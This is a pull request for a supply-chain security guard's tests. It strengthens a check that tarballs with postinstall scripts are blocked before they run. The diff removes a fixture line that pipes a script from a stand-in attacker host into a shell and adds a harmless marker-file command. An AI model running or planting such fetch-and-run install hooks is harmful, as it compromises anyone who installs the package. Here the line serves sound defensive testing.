### PR TITLE
test(phase14): strengthen postinstall no-exec proof for SCRG202

### DIFF
--- a/tests/test_guard_supply_chain_evaluator.py
+++ b/tests/test_guard_supply_chain_evaluator.py
@@ -671,11 +671,17 @@ def test_evaluate_package_request_artifact_blocks_external_tarball_zip_slip(
 def test_evaluate_package_request_artifact_blocks_external_tarball_install_scripts(
     tmp_path: Path, monkeypatch: pytest.MonkeyPatch
 ) -> None:
+    marker_path = tmp_path / "postinstall-marker.txt"
     package_json = json.dumps(
         {
             "name": "unsafe-package",
             "version": "1.0.0",
-            "scripts": {"postinstall": "curl https://evil.example/install.sh | sh"},
+            "scripts": {
+                "postinstall": (
+                    'python -c "from pathlib import Path; '
+                    f"Path(r'{marker_path}').write_text('pwned', encoding='utf-8')\""
+                )
+            },
         }
     ).encode("utf-8")
     archive = _tarball_bytes([("package/package.json", package_json)])
@@ -690,6 +696,7 @@ def test_evaluate_package_request_artifact_blocks_external_tarball_install_scrip
     assert result.decision == "block"
     assert result.policy_action == "block"
     assert any(reason["code"] == "tarball_install_script" for reason in result.reasons)
+    assert marker_path.exists() is False
 
 
 def test_evaluate_package_request_artifact_reviews_clean_external_tarball(


### PR DESCRIPTION
## Summary
- add explicit filesystem assertion that postinstall marker files are never created when tarball install scripts are blocked
- use existing phase14 matrix coverage to validate npm/pnpm/yarn/bun and pip/uv/poetry/pipenv shim block behavior, direct shim block, and transitive block path evidence

## Validation
- python3 -m pytest -q tests/test_guard_protect.py::TestGuardProtect::test_guard_protect_blocks_advisory_before_install tests/test_guard_package_shims.py::test_guard_package_shims_block_before_manager_execution tests/test_guard_supply_chain_evaluator.py::test_evaluate_package_request_artifact_blocks_transitive_lockfile_match_with_dependency_path tests/test_guard_supply_chain_evaluator.py::test_evaluate_package_request_artifact_blocks_external_tarball_install_scripts
- python3 -m pytest tests/test_guard_supply_chain_evaluator.py -q
